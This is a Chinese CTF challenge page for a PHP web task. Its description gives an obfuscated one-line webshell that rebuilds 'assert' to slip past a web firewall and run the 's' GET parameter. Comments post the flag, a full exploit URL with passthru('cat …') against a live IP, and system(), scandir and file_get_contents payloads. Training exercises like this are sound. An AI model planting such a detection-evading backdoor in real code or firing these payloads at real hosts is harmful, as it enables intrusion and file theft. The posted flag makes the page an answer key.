shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 4942
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
wxy1343 1年前

flag{5104494e7b5ec21c02e3d1c5985a4e89}

回复 0

wxy1343 1年前

http://114.67.175.224:11167/index.php?s=passthru(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

我爱你制杖 1年前

注意描述,explode为分搁符。绕来绕去就是:assert($_GET['s'])

回复 1

xclay 1年前

这题告诉我们,学什么渗透,直接猜开发者留下的接口就可以了

回复 4

2224525664 1年前

没有提示的话这题是不是就做不出来了?

回复 1

Miludear 1年前

不懂语法的可直接参考 https://blog.csdn.net/changer_we/article/details/89304399 大佬的文章,很不错,简单易懂!

回复 2

zmcck 2年前

assert(s) ?s=system("ls") ?s=system("cat flag***.txt")

回复 0

17695688750 2年前

命令执行漏洞,我以为s和url间隔要用/隔开,没想到要用?隔开,淦

回复 0

XD6 2年前

有点蠢

回复 0

bright0flavor 2年前

①var_dump(scandir('./')) ②var_dump(file_get_contents('flaga15808abee46a1d5.txt'))

回复 1

WriteUp

image
harry

3 金币

评分(6)

解题动态

LCY2117 攻破了该题 1分钟前
yixcjy 攻破了该题 2小时前
feifeifei1212 攻破了该题 4小时前
17530626785 攻破了该题 5小时前
DURUI 攻破了该题 7小时前
ntyz1919810 攻破了该题 1天前
懒大王念你 攻破了该题 1天前
jqr0630 攻破了该题 1天前
nbufe123 攻破了该题 1天前
dgreawSFD 攻破了该题 1天前
24030111073 攻破了该题 2天前
reaquedaue 攻破了该题 2天前
mffl 攻破了该题 2天前
0x2d3CN 攻破了该题 2天前
1870006529 攻破了该题 3天前
Xlj15562926857 攻破了该题 3天前
z19708684985 攻破了该题 3天前
当心眼睛 攻破了该题 3天前
ttmtmy01 攻破了该题 3天前
Gyro 攻破了该题 3天前
问题反馈